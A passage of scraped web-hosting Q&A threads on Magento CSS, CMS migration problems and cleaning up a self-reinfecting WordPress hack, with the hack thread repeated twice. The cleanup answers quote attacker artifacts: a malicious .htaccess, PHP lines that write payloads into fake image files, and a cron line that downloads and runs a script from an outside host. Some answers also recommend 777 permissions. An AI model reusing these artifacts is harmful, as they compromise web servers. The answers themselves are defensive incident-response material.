I have installed Magento on live server. But the problem is that its not loading css. I have double checked .htaccess file but There is nothing any issue in it. I have given full access permission on Var, Media & app/etc folder.
Please let me know that what is the issue ?
Thanks in advance.
Alex S.
In my case it is due to .htaccess file. In my project there is an .htaccess file in /skin folder with following content:
Header set Access-Control-Allow-Origin "*"
I have removed this file and it works fine.
View the source of your page and click the css links, if it is pointed correctly it should bring you to the css page.
For htaccess, make sure the RewriteBase / is uncommented. So from #RewriteBase / to RewriteBase /. Check the error log if possible. And, another thing i remember, you may need to clear your cache and tmp folder too. Do this first, clear cache and tmp folder.
At the time of installation magento asked about secure URL and unsecure URL. These urls must be changed when we change our server. If you couldn't access admin >> system >> configuration
Then you could change it from database. Find in table
dbprefix . core_config_data
change path
web/unsecure/base_url to your new domain name
web/secure/base_url to your new domain name
Note : Please don't forget to put forward trailing slash at last. like: www.newdomain.com/
Thanks.
When you changed base_url path in Mysql
as : web/secure/base_url = http://example.com/
Must mention / at the end of .com
Then clear session and cache.
Then restart MySQL and Apache2.
Similar for unsecure/base_url.
I will suggest follow step by step.
There is 2 case:
1) You can see your CCS directly from URL, so browser load it by direct URL, example: http://your-magento/skin/frontend/your-package/your-theme/css/styles.css, so in this case you should check points connected with Magento:
Check/Correct Base URL from config or DB
Clear Cache
Clear Sessions
Check Configurations
2) If your CSS is not loading by direct URL. So in this case it is not connected with Magento at all.
In this case you should check follwoing points:
Check files and folders permissions
Check rewrite rules and modules
Server Log files to find error
Check .htaccess for existance and for correctness.
Important, check all .htaccess files in all sub-folders.
In my case, I differed this 2 cases and start seaching my issue in second case.
I found .htaccess in folder /skin/frontend/your-package/your-theme/
The content was following:
Order deny,allow
Deny from all
Remove this file and your CSS files will be loaded.
I don't know how this file was created, I don't have file like this in parent theme. I think Magento is automatically created it. Be attentive and follow changes with GIT.
Check permissions for the folders like app/etc, var, media folders. Try to give 777 permissions to those folders. Recently I have faced the same problem and I tried with this. Then my site works fine.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 10 months ago.
Improve this question
I have a wordpress site that features a .htaccess and a file called postfs.php.
But when I try to delete them, they are written again.
I tried to delete all the files on the site, change permissions, check the cron ... but nothing to do. These files appear as soon as I delete or edit them.
The contents of the file are as follows:
.htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
Order allow,deny
Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
And the postfs.php have that content: PHP Decode
How can avoid the restoring of this files?
Has anyone had similar experiences?
I had the same problem and the antivirus was not able to detect it and also the problem of automatically creating files was not related to CronJobs, as friends mentioned.
In fact, every time a page is opened from the site, those files are rebuilt.
I have carefully examined the issue and offer the solution.
The problem occurs for both .htaccess and index.php.
First we search for a keyword in the text of the file:
# grep -lir "wjsindex.php" ./
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess
For another file, we search for a keyword in the text:
# grep -lir "RZXiMOEbYmVH" ./
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif
If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.
Sample:
We now search for all four files found:
# grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
./wp-includes/load.php
./wp-includes/template-loader.php
If you edit these two results files.
At the bottom of the file load.php and at the beginning of the file template-loader.php you will see the extra code that needs to be removed. (Starting with //ckIIbg)
To find out more exactly which sections are correct and which are malicious, just replace that file from another WordPress that you are sure is safe and the same version, or find and remove the extra sections with the diff command.
Thus:
# diff ./wp-includes/load.php ~healthy/www/wp-includes/load.php
# diff ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php
And as a final step, delete the four malicious image files:
# rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif
Edited:
And also check cronjobs (/var/spool/cron/username) for be like this infected line and remove it:
* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
This code create a ./css/index.php file and can be deleted.
We had the same exact hack a while ago
The first step is to decode the index.php file, and after decoding we see that there are 4 infected image files
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
First delete the infected 4 images, and check your cron and delete any cron job you didn't create.
Run this ssh to delete all .htaccess files within all sub directories
find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;
Use the default wordpress .htaccess, and index.php files.
After finishing, you can install wordfence, and activate the firewall, also don't forget to update your wordpress core, plugins, and themes.
If files start reappearing after you deleted them you should look out for lines of code - often in the index.php file - where a time-limit or a TTL (Time To Live) is specified, along with a (most of the time) very long line of base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.)
The way this works is the time-limit / TTL makes sure all files are held up against a reference set of files located either on another url or in the webservers cache, and if one is missing it will sync itself back.
One thing you can do to solve this is deleting the script together with restarting apache and php / nginx. This cleans out the webservers cache.
After that you can clean out the malicious deny allow rules and stuff that's in the .htaccess files and probably other stuff that's lurking between the files and folders of your webapplication.
Bonus suggestions to really try and solve the actual security issue here:
Always make sure ALL software / plugins / modules / themes / etc. is up to date. Don't miss out on any security patches!
Make sure to change every password on every account providing access to your webapplication. (don't forget the FTP accounts and backend panels and stuff).
Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one)
Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!
At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.
I hope this helps out others with similar issues!
in the first step, you should find shell file
(your host provider can does it with antisheller )
1.remove unused theme and plugin in the WordPress
2.login in SSH area and run this command
`find /home/.../wordpres_directory -type f -name ".htaccess" -delete
3.open the updated page with this link
youdomain/tld/wp-admin/update-core.php?action=do-core-reinstall
if you still see the problem you should do step 2 and 3
your server need security config, call to host provider to secure the server
i solved problem
create new FTP account and editing htacceess and index.php whit Filezila . then you should deletin wp-admin and uploading new file and folder by new version wordpress. also wp-include . and then you can
You must search for every .htaccess file and use an FTP client and deleted it. (almost 5000 in my case) Upgrade plugins to solve security breaks.
Dunno if this is still active, but if someone comes across this. This was how I solved this:
First isolate the website to my IP so I could work alone.
Removed WP installed keept wp-content.
Updated WP manual trough FTP.
Repair / recreate DB.
Deactivate all plugins.
Disable themes simplest way is just to tmp change the name on the themes folder to _theme istead of themes.
Update all plugins.
Checked active theme folder for changed date. Found a folder in my inc folder that had a index.php and forge.php. Removed those.
Lastly checked root folder again. Found a folder called CSS removed that aswell since that also had php files that did not belong.
Removed htaccess files according to above.
Recreated htaccess file.
Activated all plugins and themes.
Checked once more for file changes is I had missed anything.
Allow traffic to site once more and keep an eye on access.log for wierd requests.
Maybe don't help everyone but this worked fine for me and no traces are left.
GLHF!
Ultimately.. none of them work. Follow this option and keep monitoring the .htaccess and index.php file in the respective domain folder where you see this issue.
Dont uninstall / drop the wordpress installation. All the records stored will be gone.
Take a backup of the DB file from MySQL, by looking for the DB mapped to the domain
Now create a new sub-domain
Install wordpress mapped to the sub-domain
import the db to the newly created DB [against the new WP instance]
create the respective views... you will have to open the sql file and change the user / dbname against the views created and manually restore them
once all the above done, now open the table wpxx_options and update the 2 records with the new sub-domain name
8.Now go to WP and add the theme which you had installed earlier [dont use a new one]
Install only the required plugins and not all as you did earlier installation
go to wp_content folder [from earlier installation] and get all the media files and copy them to the wp_content folder [1999,2000,20xx...] folders is what I meant and not all
finally go to your wp-config.php and change the table prefix to the new one
//$table_prefix = 'wpxx_'; //old one
$table_prefix = 'wp1234_'; // new one
with this I think it should work.
Had tried by removing the files and uninstalling all, including domain and restored.. the same junk info gets updated in the two files [.htaccess and index.php].. so had to follow the above steps.. its working for now.. have to keep monitoring the above files. Hope it works for you too..if you have additional findings.. do update here
You might have a cronjob that keeps on adding the .htaccess files, lookuout for a cronjob with a wget request to hello.turnedpro.xyz.
If you are using cpanel you can reset your cpanel account password and run antimalware scan for any keyloggers/malware .e.g redline stealer.
I had the very same problem, In my case, I had several wp sites under one user, very convenient for me to maintain the sites, but made the clean up more tricky, sort of whack a mole situation.
Both malicious .htaccess and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the .htaccess and index.php infected did not regenerate anymore, so after copying the fresh wp files, everything was fine, and was able to access wp-admin correctly.
in one particular wp folder, even deleting all the files, infected .htaccess and index.php files were still regenerating, so what I did was to delete the root folder containing the WP install and create a new one with a different name, and after pointing the domain name to the new folder, voila! all fine!
Today I found a WordPress 5.7.5 Infected, all Htaccess files had permissions for malicious files in the whole menu panel, and then backed up everything, I found several files with strange names that were infected in the root and other locations, I removed, I changed all the passwords, I downloaded the official installation WordPress 5.7.5, I deleted the WP-admin folder and I sent from the official installation in this Paniel normalized and I could update all the plugins, so I did the same with WP-includes, already the WP-content I requested the hosting that runs the find command to delete all htaccess so I did upgrade to a new version.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 10 months ago.
Improve this question
I have a wordpress site that features a .htaccess and a file called postfs.php.
But when I try to delete them, they are written again.
I tried to delete all the files on the site, change permissions, check the cron ... but nothing to do. These files appear as soon as I delete or edit them.
The contents of the file are as follows:
.htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
Order allow,deny
Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
And the postfs.php have that content: PHP Decode
How can avoid the restoring of this files?
Has anyone had similar experiences?
I had the same problem and the antivirus was not able to detect it and also the problem of automatically creating files was not related to CronJobs, as friends mentioned.
In fact, every time a page is opened from the site, those files are rebuilt.
I have carefully examined the issue and offer the solution.
The problem occurs for both .htaccess and index.php.
First we search for a keyword in the text of the file:
# grep -lir "wjsindex.php" ./
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess
For another file, we search for a keyword in the text:
# grep -lir "RZXiMOEbYmVH" ./
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif
If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.
Sample:
We now search for all four files found:
# grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
./wp-includes/load.php
./wp-includes/template-loader.php
If you edit these two results files.
At the bottom of the file load.php and at the beginning of the file template-loader.php you will see the extra code that needs to be removed. (Starting with //ckIIbg)
To find out more exactly which sections are correct and which are malicious, just replace that file from another WordPress that you are sure is safe and the same version, or find and remove the extra sections with the diff command.
Thus:
# diff ./wp-includes/load.php ~healthy/www/wp-includes/load.php
# diff ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php
And as a final step, delete the four malicious image files:
# rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif
Edited:
And also check cronjobs (/var/spool/cron/username) for be like this infected line and remove it:
* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
This code create a ./css/index.php file and can be deleted.
We had the same exact hack a while ago
The first step is to decode the index.php file, and after decoding we see that there are 4 infected image files
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
First delete the infected 4 images, and check your cron and delete any cron job you didn't create.
Run this ssh to delete all .htaccess files within all sub directories
find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;
Use the default wordpress .htaccess, and index.php files.
After finishing, you can install wordfence, and activate the firewall, also don't forget to update your wordpress core, plugins, and themes.
If files start reappearing after you deleted them you should look out for lines of code - often in the index.php file - where a time-limit or a TTL (Time To Live) is specified, along with a (most of the time) very long line of base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.)
The way this works is the time-limit / TTL makes sure all files are held up against a reference set of files located either on another url or in the webservers cache, and if one is missing it will sync itself back.
One thing you can do to solve this is deleting the script together with restarting apache and php / nginx. This cleans out the webservers cache.
After that you can clean out the malicious deny allow rules and stuff that's in the .htaccess files and probably other stuff that's lurking between the files and folders of your webapplication.
Bonus suggestions to really try and solve the actual security issue here:
Always make sure ALL software / plugins / modules / themes / etc. is up to date. Don't miss out on any security patches!
Make sure to change every password on every account providing access to your webapplication. (don't forget the FTP accounts and backend panels and stuff).
Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one)
Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!
At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.
I hope this helps out others with similar issues!
in the first step, you should find shell file
(your host provider can does it with antisheller )
1.remove unused theme and plugin in the WordPress
2.login in SSH area and run this command
`find /home/.../wordpres_directory -type f -name ".htaccess" -delete
3.open the updated page with this link
youdomain/tld/wp-admin/update-core.php?action=do-core-reinstall
if you still see the problem you should do step 2 and 3
your server need security config, call to host provider to secure the server
i solved problem
create new FTP account and editing htacceess and index.php whit Filezila . then you should deletin wp-admin and uploading new file and folder by new version wordpress. also wp-include . and then you can
You must search for every .htaccess file and use an FTP client and deleted it. (almost 5000 in my case) Upgrade plugins to solve security breaks.
Dunno if this is still active, but if someone comes across this. This was how I solved this:
First isolate the website to my IP so I could work alone.
Removed WP installed keept wp-content.
Updated WP manual trough FTP.
Repair / recreate DB.
Deactivate all plugins.
Disable themes simplest way is just to tmp change the name on the themes folder to _theme istead of themes.
Update all plugins.
Checked active theme folder for changed date. Found a folder in my inc folder that had a index.php and forge.php. Removed those.
Lastly checked root folder again. Found a folder called CSS removed that aswell since that also had php files that did not belong.
Removed htaccess files according to above.
Recreated htaccess file.
Activated all plugins and themes.
Checked once more for file changes is I had missed anything.
Allow traffic to site once more and keep an eye on access.log for wierd requests.
Maybe don't help everyone but this worked fine for me and no traces are left.
GLHF!
Ultimately.. none of them work. Follow this option and keep monitoring the .htaccess and index.php file in the respective domain folder where you see this issue.
Dont uninstall / drop the wordpress installation. All the records stored will be gone.
Take a backup of the DB file from MySQL, by looking for the DB mapped to the domain
Now create a new sub-domain
Install wordpress mapped to the sub-domain
import the db to the newly created DB [against the new WP instance]
create the respective views... you will have to open the sql file and change the user / dbname against the views created and manually restore them
once all the above done, now open the table wpxx_options and update the 2 records with the new sub-domain name
8.Now go to WP and add the theme which you had installed earlier [dont use a new one]
Install only the required plugins and not all as you did earlier installation
go to wp_content folder [from earlier installation] and get all the media files and copy them to the wp_content folder [1999,2000,20xx...] folders is what I meant and not all
finally go to your wp-config.php and change the table prefix to the new one
//$table_prefix = 'wpxx_'; //old one
$table_prefix = 'wp1234_'; // new one
with this I think it should work.
Had tried by removing the files and uninstalling all, including domain and restored.. the same junk info gets updated in the two files [.htaccess and index.php].. so had to follow the above steps.. its working for now.. have to keep monitoring the above files. Hope it works for you too..if you have additional findings.. do update here
You might have a cronjob that keeps on adding the .htaccess files, lookuout for a cronjob with a wget request to hello.turnedpro.xyz.
If you are using cpanel you can reset your cpanel account password and run antimalware scan for any keyloggers/malware .e.g redline stealer.
I had the very same problem, In my case, I had several wp sites under one user, very convenient for me to maintain the sites, but made the clean up more tricky, sort of whack a mole situation.
Both malicious .htaccess and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the .htaccess and index.php infected did not regenerate anymore, so after copying the fresh wp files, everything was fine, and was able to access wp-admin correctly.
in one particular wp folder, even deleting all the files, infected .htaccess and index.php files were still regenerating, so what I did was to delete the root folder containing the WP install and create a new one with a different name, and after pointing the domain name to the new folder, voila! all fine!
Today I found a WordPress 5.7.5 Infected, all Htaccess files had permissions for malicious files in the whole menu panel, and then backed up everything, I found several files with strange names that were infected in the root and other locations, I removed, I changed all the passwords, I downloaded the official installation WordPress 5.7.5, I deleted the WP-admin folder and I sent from the official installation in this Paniel normalized and I could update all the plugins, so I did the same with WP-includes, already the WP-content I requested the hosting that runs the find command to delete all htaccess so I did upgrade to a new version.
I've read a lot on the internet about how to move Joomla. So, confident in myself, I've moved this old joomla 1.5 website to another machine.
I've copied files and database (data and user) as it were in the old machine on the new. Same folder name, same apache2 configuration, same .htaccess, same database configuration, name and data, same operative system, same php version...
Unfortunately, any page I'm trying to visit return a "404 component not found error" like it cannot find the page.
I cannot get what is happening. Mooving Joomla requires particular attentions, after copying files and database?
You have to change in configuration.php file the path of log and tmp directory, It's hard for you to have the same path in a different machine.
In the log file there are more details? Type what component.
Some things to check when a moved Joomla website is not working as expected:
the .htaccess file (in particular, check the RewriteBase /, Options +FollowSymLinks lines or any non-standard lines - compare with htaccess.txt for the default settings)
the configuration.php file, check tmp and logs paths are correct, try setting $live_site = ''; if it's not already
check for any php.ini files in the root folder and also in the /administrator folder - php.ini files are often not needed any more as you can configure PHP settings via cPanel or similar
try disabling URL Rewriting in Global Configuration
I have Code Igniter based site and I have it on ubuntu 12.04 in /var/www/mysite folder
My ubuntu serves as a server so I access my site trough other computer, but both computers are on LAN network. I use http://xxx.yyy.zzz.ttt/mysite url to access it.
The problem I have is that I cannot use url without "index.php" in it.
So I have http://xxx.yyy.zzz.ttt/mysite/index.php/phpinfo To acces my controller phpinfo instead of http://xxx.yyy.zzz.ttt/mysite/phpinfo
I have cheked well that mod_revrite works well with this here
And also checked that the folder, files and subfolders in mysite have all 777 file permissions.
I also added all necessary rules in .htaccess file but still no success
Any idea what is causing this.
The first thing I would do is make sure you followed all of the CI instructions.
It may be that you did not update the config file to be a blank string rather than using index.php
Do you know what was the issue.
The default file in sites-available had option
AllowOverride None for /var/wwww
I set it to All and it worked out. :)
cheers :)
I posted a question earlier today asking which files needed to be changed to move drupal to MAMP successfully.
I've now moved it all over and connected it to the database, however, I'm stuck in a redirect loop whilst trying to view the website. As far as I can gather, the redirect loop is stuck between index.php and install.php
How do I fix this? What would cause a redirect loop?
I read somewhere that there was a redirect file in a tmp directory and removing it will solve the issue, but for me the file doesn't exist.
Check if your web server has read permissions for settings.php.
Also check if the database is set up properly. As always, drush is your friend.
Sounds like an .htaccess issue, this happens sometimes when you're moving the site from a root path (ie. example.com/) to a subfolder (ie. localhost:8888/drupal/).
Try changing the RewriteBase in the .htaccess file to:
RewriteBase /drupal/
Where drupal is the name of the subfolder Drupal is installed in.
Due to my own in-experience with Drupal, I failed to recognise that the site in question was a Drupal Multi-site. The sites folder contained 'all' and 'example.com' There was no 'default' folder.
There was two solutions to my issue.
Set up MAMP as a Virtual Host (so example.com would direct to my mamp installation and so tick all the boxes for the files redirection)
Change the folder name to 'localhost' and not 'example.com'
The second solution did leave me with one or two issues, but as I'm only needing this installation for the theme I decided a botched solution would be least time consuming.